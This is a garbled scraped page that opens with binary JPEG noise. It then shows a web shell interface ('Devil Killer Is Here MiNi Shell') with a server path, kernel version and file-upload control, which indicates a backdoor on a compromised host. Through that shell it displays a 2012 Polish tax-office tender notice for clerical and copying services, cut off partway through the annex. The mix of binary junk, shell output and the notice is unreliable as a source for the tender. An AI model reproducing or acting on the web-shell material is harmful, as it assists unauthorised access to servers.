JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120725/270182-N-2012.html

<p class="kh_header"><b>Gorzów Wielkopolski: Świadczenie usług wprowadzania danych, 
usług kancelaryjnych, obsługi urządzeń kopiujących oraz wykonywanie dodatkowych usług biurowych na potrzeby Urzędu Skarbowego w Gorzowie Wlkp. 
(wg CPV 72312000-5 Usługi wprowadzania danych, 79570000-0 Usługi w zakresie tworzenia list adresowych oraz usługi wysyłkowe, 79521000-2 Usługi fotokopiowania, 79500000-9 Dodatkowe usługi biurowe)</b><br>
<b>Numer ogłoszenia: 270182 - 2012; data zamieszczenia: 25.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy , ul. Jagiellończyka 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7115742, faks 095 7228997.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.usgorzow.mf.gov.pl    nowy nr faxu 0957115905</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług wprowadzania danych, 
usług kancelaryjnych, obsługi urządzeń kopiujących oraz wykonywanie dodatkowych usług biurowych na potrzeby Urzędu Skarbowego w Gorzowie Wlkp. 
(wg CPV 72312000-5 Usługi wprowadzania danych, 79570000-0 Usługi w zakresie tworzenia list adresowych oraz usługi wysyłkowe, 79521000-2 Usługi fotokopiowania, 79500000-9 Dodatkowe usługi biurowe).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na 15 części, oznaczonych literami od A do O w następujący sposób:

1. Część A - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt.

2. Część B - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt.

3. Część C - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt.

4. Część D - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt.

5. Część E - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt.

6. Część F - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt.

7. Część G - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt.

8. Część H - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt.

9. Część I - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt.

10. Część J - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)  segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt.

11. Część K: Przedmiot zamówienia obejmuje w okresie trwania umowy: 
1)	przygotowywanie korespondencji do wysyłki - 4.000 szt.,
2)	rejestracja (migracja) upomnień do Biblioteki Akt - 3.000 szt.,
3)	odnotowywanie daty odbioru upomnienia w POLTAX 2B - 3.750 szt.,
4)	stemplowanie upomnień, kopert, potwierdzeń odbioru - 3.750 szt.,
5)	stemplowanie tytułów wykonawczych -3.500 szt.,
6)	przygotowywanie tytułów wykonawczych do wysyłki -100 szt.,
7)	przygotowywanie pism do organów egzekucyjnych związanych z prowadzonym postępowaniem egzekucyjnym - 10 szt.,
8)	sporządzanie kserokopii dokumentów - 100 szt.,
9)	segregowanie, wpinanie dokumentów związanych z postępowaniem egzekucyjnym -3.500 szt.,
10)	archiwizowanie akt dotyczących postępowania egzekucyjnego - 30 szt.,
11)	wyszukiwanie dokumentów związanych z postępowaniem egzekucyjnym w archiwum - 10 szt.

12. Część L: Przedmiot zamówienia obejmuje w okresie trwania umowy: 
1)	przygotowywanie korespondencji do wysyłki - 4.000 szt.,
2)	rejestracja (migracja) upomnień do Biblioteki Akt - 3.000 szt.,
3)	odnotowywanie daty odbioru upomnienia w POLTAX 2B - 3.750 szt.,
4)	stemplowanie upomnień, kopert, potwierdzeń odbioru - 3.750 szt.,
5)	stemplowanie tytułów wykonawczych - 3.500 szt.,
6)	przygotowywanie tytułów wykonawczych do wysyłki - 100 szt.,
7)	przygotowywanie pism do organów egzekucyjnych związanych z prowadzonym postępowaniem egzekucyjnym - 10 szt.,
8)	sporządzanie kserokopii dokumentów - 100 szt.,
9)	segregowanie, wpinanie dokumentów związanych z postępowaniem egzekucyjnym -3.500 szt.,
10)	archiwizowanie akt dotyczących postępowania egzekucyjnego - 30 szt.,
11)	wyszukiwanie dokumentów związanych z postępowaniem egzekucyjnym w archiwum - 10 szt.

13. Część M - Przedmiot zamówienia obejmuje w okresie trwania umowy, wykonywanie czynności kancelaryjnych, tj.:
1)	przyjmowanie od pracowników Zamawiającego korespondencji dot. egzekucji administracyjnej - 19.110 szt.,
2)	przyjmowanie korespondencji zewnętrznej (np. od komorników) dot. egzekucji administracyjnej - 4.600 szt.,
3)	segregowanie korespondencji zewnętrznej, o której mowa w ppkt 2 - 4.600 szt.,
4)	ręczne wpisywanie korespondencji do książek nadawczych - 11.907 szt.,
5)	wpisywanie korespondencji do książek nadawczych w systemie informatycznym Biblioteka Akt - 1.250 szt.

14. Część N - Przedmiot zamówienia obejmuje w okresie trwania umowy, wykonywanie czynności kancelaryjnych, tj.:
1) przyjmowanie od pracowników Zamawiającego korespondencji dot. egzekucji administracyjnej - 19.110 szt.,
2)	przyjmowanie korespondencji zewnętrznej (np. od komorników) dot. egzekucji administracyjnej - 4.600 szt.,
3)	segregowanie korespondencji zewnętrznej, o której mowa w ppkt 2 - 4.600 szt.,
4)	ręczne wpisywanie korespondencji do książek nadawczych -11.907 szt.,
5)	wpisywanie korespondencji do książek nadawczych w systemie informatycznym Biblioteka Akt - 1.250 szt.

15. Część O - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	obsługę urządzeń kopiujących, sporządzanie kserokopii dokumentów - 6.000 szt.,
2)	ręczne wpisywanie korespondencji do książek nadawczych - 11.906 szt.,
3)  wpisywanie korespondencji do książek nadawczych w systemie informatycznym Biblioteka Akt - 500 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości do 20 % na świadczenie usług wprowadzania danych, usług kancelaryjnych, obsługi urządzeń kopiujących oraz wykonywanie dodatkowych usług biurowych na potrzeby Urzędu Skarbowego w Gorzowie Wlkp. (wg CPV 72312000-5 Usługi wprowadzania danych, 79570000-0 Usługi w zakresie tworzenia list adresowych oraz usługi wysyłkowe, 79521000-2 Usługi fotokopiowania, 79500000-9 Dodatkowe usługi biurowe)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca winien przedłożyć aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy Prawo zamówień publicznych, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych prowadzących działalność gospodarczą, oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, sporządzone według wzoru stanowiącego załącznik nr 2 do oferty.
      (Zapis ten nie dotyczy osób fizycznych nie prowadzących działalności gospodarczej.)
2. Wykonawca winien również złożyć następujące dokumenty:
a)	wypełniony i podpisany formularz oferty (Rozdział III SIWZ) wraz z załącznikami,
b)	pełnomocnictwo do reprezentowania Wykonawcy, jeżeli nie wynika ono z innych złożonych dokumentów.
3. Oświadczenie podmiotów występujących wspólnie, w którym Wykonawcy zobowiązują się m.in. do:
a)	solidarnej odpowiedzialności wszystkich podmiotów w razie nie wykonania lub nienależytego wykonania przedmiotu umowy,
b)	nie rozwiązywania umowy przez któregokolwiek z Wykonawców, przed wykonaniem zobowiązań wynikających z umowy, 
c)	ustanowienia pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego z określeniem zakresu pełnomocnictwa. 
	Przyjmuje się, że pełnomocnictwo do podpisywania oferty obejmuje pełnomocnictwo do poświadczania za zgodność z oryginałem wszystkich dokumentów. Pełnomocnictwo musi wynikać z załączonych do oferty dokumentów oraz mieć formę pisemną. Wszelka korespondencja prowadzona będzie z Pełnomocnikiem.   
d)	niedokonywania zmian w umowie bez zgody Zamawiającego,
e)	przedstawienie podziału usług przez poszczególnych Wykonawców.
Wykonawcy składający ofertę wspólnie winni wskazać Wykonawcę, na konto którego będą przekazywane należności z tytułu realizacji przedmiotu zamówienia.

UWAGA:
1) każdy podmiot zobowiązany jest do złożenia wszystkich wymaganych w pkt III SIWZ dokumentów i zaświadczeń,
2) okoliczności uzasadniające wykluczenie z postępowania w oparciu o przepisy art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych zachodzące choćby względem pojedynczego Wykonawcy, dyskwalifikują całą grupę Wykonawców ubiegających się wspólnie o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.usgorzow.mf.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy ul. Jagiellończyka 10, 66-400 Gorzów Wlkp. (pok. 240 I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2012 godzina 09:15, miejsce: Urząd Skarbowy ul. Jagiellończyka 10, 66-400 Gorzów Wlkp. (pok. 240 I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część A - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część A - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część B - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część B - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
